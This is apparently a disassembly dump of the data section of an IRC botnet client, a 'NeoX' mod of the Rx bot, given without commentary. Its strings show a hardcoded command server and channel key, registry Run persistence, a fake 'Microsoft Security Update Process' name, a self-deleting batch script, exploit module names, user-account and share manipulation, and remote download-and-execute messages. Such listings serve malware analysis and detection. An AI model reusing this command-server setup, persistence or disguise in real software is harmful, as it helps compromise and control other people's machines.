; char aSendto[]
aSendto db 'sendto',0 ; DATA XREF: sub_407087+69E�o
align 4
; char aRecv[]
aRecv db 'recv',0 ; DATA XREF: sub_407087+6B1�o
align 4
; char aRecvfrom[]
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_407087+6C4�o
align 10h
; char aBind[]
aBind db 'bind',0 ; DATA XREF: sub_407087+6D7�o
align 4
; char aSelect[]
aSelect db 'select',0 ; DATA XREF: sub_407087+6EA�o
align 10h
; char aListen[]
aListen db 'listen',0 ; DATA XREF: sub_407087+6FD�o
align 4
; char aAccept[]
aAccept db 'accept',0 ; DATA XREF: sub_407087+710�o
align 10h
; char aSetsockopt[]
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_407087+723�o
align 4
; char aGetsockname[]
aGetsockname db 'getsockname',0 ; DATA XREF: sub_407087+736�o
; char aGethostname[]
aGethostname db 'gethostname',0 ; DATA XREF: sub_407087+749�o
; char aGethostbyname[]
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_407087+75C�o
align 4
; char aGethostbyaddr[]
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_407087+76F�o
align 4
; char aGetpeername[]
aGetpeername db 'getpeername',0 ; DATA XREF: sub_407087+782�o
; char aClosesocket[]
aClosesocket db 'closesocket',0 ; DATA XREF: sub_407087+795�o
; char aWininet_dll[]
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_407087:loc_407980�o
; char aInternetgetcon[]
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_407087+911�o
align 4
; char aInternetgetc_0[]
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_407087+924�o
; char aHttpopenreques[]
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_407087+937�o
align 4
; char aHttpsendreques[]
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_407087+94A�o
align 4
; char aInternetconnec[]
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_407087+95D�o
align 4
; char aInternetopena[]
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_407087+970�o
align 4
; char aInternetopenur[]
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_407087+983�o
align 10h
; char aInternetcracku[]
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_407087+996�o
align 4
; char aInternetreadfi[]
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_407087+9A9�o
align 4
; char aInternetcloseh[]
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_407087+9BC�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_407087+A44�o
align 4
; char aNetapi32_dll[]
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_407087:loc_407B09�o
align 4
; char aNetshareadd[]
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_407087+A9A�o
; char aNetsharedel[]
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_407087+AAD�o
; char aNetshareenum[]
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_407087+AC0�o
align 10h
; char aNetschedulejob[]
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_407087+AD3�o
align 4
; char aNetapibufferfr[]
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_407087+AE6�o
align 4
; char aNetremotetod[]
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_407087+AF9�o
align 4
; char aNetuseradd[]
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_407087+B0C�o
align 4
; char aNetuserdel[]
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_407087+B1F�o
align 10h
; char aNetuserenum[]
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_407087+B32�o
; char aNetusergetinfo[]
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_407087+B45�o
align 4
; char aNetmessagebuff[]
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_407087+B58�o
align 4
; char aDnsapi_dll[]
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_407087:loc_407C76�o
align 10h
; char aDnsflushresolv[]
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_407087+C03�o
align 4
; char aDnsflushreso_0[]
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_407087+C16�o
align 4
; char aIphlpapi_dll[]
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_407087:loc_407CE3�o
align 4
; char aGetipnettable[]
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_407087+C70�o
align 4
; char aDeleteipnetent[]
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_407087+C83�o
align 4
; char aMpr_dll[]
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_407087:loc_407D50�o
; char aWnetaddconnect[]
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_407087+CDD�o
; char aWnetaddconne_0[]
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_407087+CF0�o
; char aWnetcancelconn[]
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_407087+D03�o
align 4
; char aWnetcancelco_0[]
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_407087+D16�o
align 4
; char aShell32_dll[]
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_407087:loc_407DF5�o
; char aShellexecutea[]
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_407087+D82�o
align 4
; char aShchangenotify[]
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_407087+D95�o
align 4
; char aOdbc32_dll[]
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_407087:loc_407E62�o
align 4
; char aSqldriverconne[]
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_407087+DF3�o
align 4
; char aSqlsetenvattr[]
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_407087+E06�o
align 4
; char aSqlexecdirect[]
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_407087+E19�o
align 4
; char aSqlallochandle[]
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_407087+E2C�o
align 4
; char aSqlfreehandle[]
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_407087+E3F�o
align 4
; char aSqldisconnect[]
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_407087+E52�o
align 4
; char aSErrorSD_[]
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_40834A+A3�o
align 4
aMirc db 'mIRC',0 ; DATA XREF: sub_40840B+8�o
align 4
; char Name[]
Name db 'mIRC',0 ; DATA XREF: sub_40840B+1C�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_4084A5+19�o
align 4
aSS_5 db '%s %s',0 ; DATA XREF: .text:004085D3�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_408626+5�o
; char aSdel_bat[]
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_408651+41�o
align 4
; char a[]
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_408651+8B�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
; char aComspecCSS[]
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_408651+16E�o
align 10h
a_: ; DATA XREF: .text:00408852�o
unicode 0, <.>,0
a__0: ; DATA XREF: .text:00408877�o
unicode 0, <.>,0
; char aD_D_D_D_2[]
aD_D_D_D_2 db '%d.%d.%d.%d',0 ; DATA XREF: sub_40892F+42�o
; char aDdDhDm[]
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_408A81+70�o
a95 db '95',0 ; DATA XREF: sub_408C2B+46�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_408C2B+59�o
align 4
a98 db '98',0 ; DATA XREF: sub_408C2B+7A�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_408C2B+9B�o
align 10h
a2k db '2K',0 ; DATA XREF: sub_408C2B+B9�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_408C2B+D7�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_408C2B+F5�o
align 10h
a??? db '???',0 ; DATA XREF: sub_408C2B:loc_408D2C�o
; char aSS_6[]
aSS_6 db '%s (%s)',0 ; DATA XREF: sub_408C2B+12C�o
word_4216EC dw 3Fh ; DATA XREF: sub_408C2B+156�r
align 10h
; char aCouldnTResolve[]
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_408C2B:loc_408E08�o
align 4
; char Format[]
Format db 'dd:MMM:yyyy',0 ; DATA XREF: sub_408C2B+20B�o
; char aHhMmSs[]
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_408C2B+228�o
align 10h
; char aSysinfoCpuI64u[]
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [OS]: Windows %s (%d.%d, Build %d). ['
; DATA XREF: sub_408C2B+2B1�o
db 'Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s.'
db ' [Time]: %s. [Uptime]: %s.',0
align 10h
; char aNotConnected[]
aNotConnected db 'Not connected',0 ; DATA XREF: sub_408EF7+41�o
align 10h
; char aDialUp[]
aDialUp db 'Dial-up',0 ; DATA XREF: sub_408EF7+5E�o
; char aLan[]
aLan db 'LAN',0 ; DATA XREF: sub_408EF7:loc_408F6A�o
; char off_4217DC[]
off_4217DC dd offset loc_412F4B+3 ; DATA XREF: sub_408EF7:loc_408F7F�o
; char off_4217E0[]
off_4217E0 dd offset loc_412F4B+3 ; DATA XREF: sub_408EF7+9B�o
; char aNetinfoTypeSS_[]
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_408EF7+C3�o
align 4
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_40909D+E�o
align 4
; char aD_SS[]
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_40909D+69�o
; char a_2d_2d4d_2d_2d[]
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_40913D+7D�o
align 4
aLogs db '-[Logs]-',0 ; DATA XREF: .text:00409227�o
align 10h
dword_421870 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 1F702E73h, 29671F6Ch
; DATA XREF: sub_409303+34�o
dd 0BBBB0220h, 20202002h, 61656C43h, 2E646572h, 0
dword_421898 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 1F702E73h, 29671F6Ch
; DATA XREF: sub_409303:loc_40934A�o
dd 0BBBB0220h, 20202002h, 61656C43h, 2E646572h, 0
dword_4218C0 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_4093A7+42�o
dd 2BBBB02h, 65422020h, 6E6967h
; char dword_4218E0
dword_4218E0 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_4093A7:loc_4094EE�o
dd 2BBBB02h, 694C2020h, 63207473h, 6C706D6Fh, 2E657465h
dd 2 dup(0)
dword_421910 dd 80000002h off_421914 dd offset aSoftwareMicros ; DATA XREF: sub_40954C+2E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 421D74h, 80000001h, 421DACh
; char unk_421928
unk_421928 db 2 ; DATA XREF: sub_4095D3+94�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s.',0
align 10h
; char unk_421960
unk_421960 db 2 ; DATA XREF: sub_4095D3+217�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileDownloadSD db ' File download: %s (%dKB transferred).',0
align 4
; char unk_4219A8
unk_4219A8 db 2 ; DATA XREF: sub_4095D3+246�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateSDkbTran db ' Update: %s (%dKB transferred).',0
align 4
; char unk_4219E8
unk_4219E8 db 2 ; DATA XREF: sub_4095D3+29A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesizeIsInco db ' Filesize is incorrect: (%d != %d).',0
align 4
; char unk_421A2C
unk_421A2C db 2 ; DATA XREF: sub_4095D3+37D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fK db ' Downloaded %.1f KB to %s @ %.1f KB/sec.',0
align 4
aOpen db 'open',0 ; DATA XREF: sub_4095D3+3D8�o
align 4
; char dword_421A7C
dword_421A7C dd 7A026E02h, 201F6D1Fh, 776F6428h, 616F6C6Eh, 1F702E64h
; DATA XREF: sub_4095D3+3F2�o
dd 29671F6Ch, 0BBBB0220h, 4F202002h, 656E6570h, 25203A64h
dd 2E73h
; char unk_421AA8
unk_421AA8 db 2 ; DATA XREF: sub_4095D3+485�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloaded_1fk db ' Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
align 4
; char unk_421AF8
unk_421AF8 db 2 ; DATA XREF: sub_4095D3+561�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUpdateFailedEr db ' Update failed: Error executing file: %s.',0
; char unk_421B40
unk_421B40 db 2 ; DATA XREF: sub_4095D3+5B2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aBadUrlOrDnsErr db ' Bad URL, or DNS Error: %s.',0
align 4
dword_421B7C dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_421BC8 dd 3000005h, 10h, 18h, 1, 3 dup(0)dword_421BE4 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_409D82+1C5�o
dword_421BF8 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_409D82+20C�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_40A08D+10�o
align 4
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40A08D:loc_40A0A6�o
; char aS_0[]
aS_0 db '%s',0 ; DATA XREF: sub_40A08D+47�o
align 10h
; char aSSS[]
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40A08D+6E�o
align 10h
dword_421C30 dd 7B9h ; WinMain(x,x,x,x)+57B�r
dword_421C34 dd 7B9h word_421C38 dw 45h ; DATA XREF: sub_404F31+3C�r
align 4
dword_421C3C dd 1 dword_421C40 dd 1 ; WinMain(x,x,x,x):loc_40A533�r
byte_421C44 db 23h ; DATA XREF: sub_409BF2+21�r
; sub_40ABFE+BBD�r ...
align 4
dword_421C48 dd 6 ; sub_40F9B6+1D�r ...
; int dword_421C4C
dword_421C4C dd 1 ; sub_40ABFE+3E0�r ...
aDcom135_1 db 'dcom135',0 ; DATA XREF: sub_40ABFE+2A44�o
db 2 dup(0)
byte_421C5A db 1 ; DATA XREF: sub_40ABFE+28C3�r
; sub_40ABFE+28EF�r
aAsn1smbnt_1 db 'asn1smbnt',0
db 1, 2 dup(0)
dd 3 dup(0)
; char aNeox[]
aNeox db 'NeoX',0 ; DATA XREF: WinMain(x,x,x,x)+79�o
; sub_40ABFE:loc_40C88F�o ...
align 4
aNeoxBotNzmM0dd db 'NeoX Bot Nzm M0dded on Rx v3.2',0 ; DATA XREF: sub_40ABFE:loc_40C2BC�o
align 4
; char aNhg_1[]
aNhg_1 db 'nhg',0 ; DATA XREF: sub_40ABFE+C7F�o
; sub_40ABFE+E28�o
; char Source[]
Source db 'neo12.cjb.net',0 ; DATA XREF: WinMain(x,x,x,x)+46A�o
; WinMain(x,x,x,x)+569�o
align 10h
; char aNhg[]
aNhg db '#!nhg!#',0 ; DATA XREF: WinMain(x,x,x,x)+488�o
; WinMain(x,x,x,x)+587�o
; char aAsdasd[]
aAsdasd db 'asdasd',0 ; DATA XREF: WinMain(x,x,x,x)+49C�o
; WinMain(x,x,x,x)+59B�o
align 10h
; char String2[]
String2 db 'Nrzi.exe',0 ; DATA XREF: sub_4011CD+30�o
; .text:004029E1�o ...
align 4
aMicrosoftSecur db 'Microsoft Security Update Process',0 ; DATA XREF: sub_40954C+5C�o
; sub_40954C:loc_4095B8�o
align 10h
aBot db '[BoT]-',0 ; DATA XREF: sub_40F94E+11�o
align 4
aNrzz32_exe db 'Nrzz32.exe',0
align 4
aIupX db '+iup-x',0 ; DATA XREF: sub_40ABFE+331�o
align 4
; char aExp_1[]
aExp_1 db '#!exp!#',0 ; DATA XREF: sub_40ABFE+2C03�o
; sub_40ABFE+2C13�o ...
aExp db '#!exp!#',0 ; DATA XREF: .text:00403A2C�o
aExp_0 db '#!exp!#',0 ; DATA XREF: sub_405D52+245�o
; sub_405D52+35D�o ...
dword_421D24 dd 1 ; sub_40A776+151�r ...
dword_421D28 dd 1Eh dword_421D2C dd 1 ; sub_40ABFE:loc_40D0F0�w ...
dword_421D30 dd 3Ch dword_421D34 dd 1 dword_421D38 dd 1 off_421D3C dd offset a@nhg_gov ; DATA XREF: sub_40ABFE+D31�r
; "*@nhg.gov"
off_421D40 dd offset aRofferV1_2b242 ; DATA XREF: sub_40ABFE+A9E�r
; sub_40ABFE+AB1�r
; "roffer v1.2b24 [20031215140650], http:/"...
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .data:off_421914�o
align 4
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicr_1 db 'Software\Microsoft\Mcwin',0
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Nitt',0
align 10h
dword_421DF0 dd 10h ; .text:0040908C�w ...
a@nhg_gov db '*@nhg.gov',0 ; DATA XREF: .data:off_421D3C�o
align 10h
aRofferV1_2b242 db 'roffer v1.2b24 [20031215140650], http://iroffer.org/',0
; DATA XREF: .data:off_421D40�o
align 4
; char aSS[]
aSS db '%s%s',0 ; DATA XREF: WinMain(x,x,x,x)+155�o
align 10h
; char aSS_0[]
aSS_0 db '%s\%s',0 ; DATA XREF: WinMain(x,x,x,x)+1E8�o
align 4
; char aSDS[]
aSDS db '%s %d "%s"',0 ; DATA XREF: WinMain(x,x,x,x)+319�o
align 4
; char dword_421E54
dword_421E54 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: WinMain(x,x,x,x):loc_40A552�o
dd 2BBBB02h, 6F422020h, 74732074h, 65747261h, 2E64h
; char dword_421E7C[]
dword_421E7C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40A776+145�o
dd 2BBBB02h
aConnectedToS_ db ' Connected to %s.',0
align 4
; char a_n_z_m_Botkill[]
a_n_z_m_Botkill db '.n.z.m. (botkiller.p.l.g) .. Botkiller.',0
; DATA XREF: sub_40A776+175�o
align 4
; char aPassS[]
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40A9EB+53�o
align 10h
; char aNickSUserS00S[]
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40A9EB+7D�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
; char SubStr[]
SubStr db ' :',0 ; DATA XREF: sub_40ABFE+9A�o
align 10h
; char Delim[]
Delim: ; DATA XREF: sub_40ABFE+CE�o
unicode 0, < >,0
; char asc_421F04[]
asc_421F04: ; DATA XREF: sub_40ABFE+109�o
unicode 0, < >,0
; char asc_421F08[]
asc_421F08: ; DATA XREF: sub_40ABFE+283�o
unicode 0, <!>,0
; char Str1[]
Str1 db 'PING',0 ; DATA XREF: sub_40ABFE+29C�o
align 4
; char aPongS[]
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+2BC�o
align 10h
; char aJoinSS[]
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+2DA�o
align 10h
; char a001[]
a001 db '001',0 ; DATA XREF: sub_40ABFE+2F8�o
; char a005[]
a005 db '005',0 ; DATA XREF: sub_40ABFE+30E�o
; char aUserhostS[]
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+321�o
align 4
; char aModeSS[]
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+339�o
align 4
; char aJoinSS_0[]
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+34F�o
align 4
; char a302[]
a302 db '302',0 ; DATA XREF: sub_40ABFE+377�o
; char a[]
a@: ; DATA XREF: sub_40ABFE+387�o
unicode 0, <@>,0
; char a433[]
a433 db '433',0 ; DATA XREF: sub_40ABFE+3CE�o
; char aNickS[]
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+3F4�o
align 10h
; char aKick[]
aKick db 'KICK',0 ; DATA XREF: sub_40ABFE+45E�o
align 4
; char dword_421F88
dword_421F88 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+516�o
dd 2BBBB02h
aUserSLoggedOut db ' User %s logged out.',0
align 4
; char aNoticeSS[]
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+537�o
; char aJoinSS_1[]
aJoinSS_1 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+579�o
align 4
; char aNick[]
aNick db 'NICK',0 ; DATA XREF: sub_40ABFE+597�o
align 10h
; char aSS_7[]
aSS_7 db ':%s%s',0 ; DATA XREF: sub_40ABFE+775�o
align 4
; char aPart[]
aPart db 'PART',0 ; DATA XREF: sub_40ABFE+7BF�o
align 10h
; char aQuit_0[]
aQuit_0 db 'QUIT',0 ; DATA XREF: sub_40ABFE+7D5�o
align 4
; char dword_421FF8
dword_421FF8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+85B�o
dd 2BBBB02h
aUserSLoggedO_0 db ' User: %s logged out.',0
align 4
; char aPart_0[]
aPart_0 db 'PART',0 ; DATA XREF: sub_40ABFE+882�o
align 10h
; char aNoticeSS_0[]
aNoticeSS_0 db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40ABFE+8A1�o
; char a353[]
a353 db '353',0 ; DATA XREF: sub_40ABFE+8C4�o
; char dword_422044[]
dword_422044 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+8F7�o
dd 2BBBB02h
aJoinedChannelS db ' Joined channel: %s.',0
align 4
; char aPrivmsg_0[]
aPrivmsg_0 db 'PRIVMSG',0 ; DATA XREF: sub_40ABFE+911�o
; char aNotice_0[]
aNotice_0 db 'NOTICE',0 ; DATA XREF: sub_40ABFE+927�o
align 4
; char a332[]
a332 db '332',0 ; DATA XREF: sub_40ABFE+93D�o
; char aPrivmsg_1[]
aPrivmsg_1 db 'PRIVMSG',0 ; DATA XREF: sub_40ABFE+964�o
; char aNotice_1[]
aNotice_1 db 'NOTICE',0 ; DATA XREF: sub_40ABFE+97A�o
align 4
; char aNotice_2[]
aNotice_2 db 'NOTICE',0 ; DATA XREF: sub_40ABFE+994�o
align 10h
; char asc_4220A0[]
asc_4220A0: ; DATA XREF: sub_40ABFE:loc_40B5BD�o
unicode 0, <#>,0
; char dword_4220A4
dword_4220A4 dd 52455601h, 4E4F4953h, 1; char dword_4220B0[]
dword_4220B0 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40ABFE+ABE�o
dd 0D017325h, 0Ah
; char aSHasJustVersio[]
aSHasJustVersio db '%s has just versioned me.',0 ; DATA XREF: sub_40ABFE+AD5�o
align 4
; char dword_4220E8
dword_4220E8 dd 4E495001h, 47h; char dword_4220F0[]
dword_4220F0 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40ABFE+B70�o
dd 0A0Dh
; char asc_422108[]
asc_422108 db '!',0 ; DATA XREF: sub_40ABFE:loc_40B82B�o
align 4
; char asc_42210C[]
asc_42210C db '~',0 ; DATA XREF: sub_40ABFE+C5A�o
align 10h
; char aNoticeSNiceTry[]
aNoticeSNiceTry db 'NOTICE %s :Nice try, idiot. (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40ABFE+CA3�o
align 4
; char aNoticeSYouVeBe[]
aNoticeSYouVeBe db 'NOTICE %s :You',27h,'ve been logged.',0Dh,0Ah,0
; DATA XREF: sub_40ABFE+CBA�o
align 4
; char dword_42215C
dword_42215C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+CD6�o
dd 2BBBB02h
aFailedPassAuth db ' *Failed pass auth by: (%s!%s).',0
align 4
; char aNoticeSNiceT_0[]
aNoticeSNiceT_0 db 'NOTICE %s :Nice try, idiot. (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40ABFE+D6E�o
align 10h
; char aNoticeSYouVe_0[]
aNoticeSYouVe_0 db 'NOTICE %s :You',27h,'ve been logged.',0Dh,0Ah,0
; DATA XREF: sub_40ABFE+D85�o
align 4
; char dword_4221E4
dword_4221E4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+DA1�o
dd 2BBBB02h
aFailedHostAuth db ' *Failed host auth by: (%s!%s).',0
align 10h
dword_422220 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+E66�o
dd 2BBBB02h
aPasswordAccept db ' Password accepted.',0
align 10h
; char dword_422250[]
dword_422250 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40ABFE+E83�o
dd 2BBBB02h
aUserSLoggedIn_ db ' User: %s logged in.',0
align 10h
; char a332_2[]
a332_2 db '332',0 ; DATA XREF: sub_40ABFE+EAD�o
; char asc_422284[]
asc_422284 db ' :',0 ; DATA XREF: sub_40ABFE+F21�o
align 4
; char aD[]
aD db '$%d-',0 ; DATA XREF: sub_40ABFE+FBA�o
align 10h
; char aD_0[]
aD_0 db '$%d',0 ; DATA XREF: sub_40ABFE+10F0�o
; char aMe_0[]
aMe_0 db '$me',0 ; DATA XREF: sub_40ABFE+1195�o
; char aUser_0[]
aUser_0 db '$user',0 ; DATA XREF: sub_40ABFE+11AC�o
align 10h
; char aChan[]
aChan db '$chan',0 ; DATA XREF: sub_40ABFE+11C2�o
align 4
; char aRndnick[]
aRndnick db '$rndnick',0 ; DATA XREF: sub_40ABFE+11E6�o
align 4
; char aServer[]
aServer db '$server',0 ; DATA XREF: sub_40ABFE+11F9�o
; char aChr[]
aChr db '$chr(',0 ; DATA XREF: sub_40ABFE:loc_40BE07�o
align 4
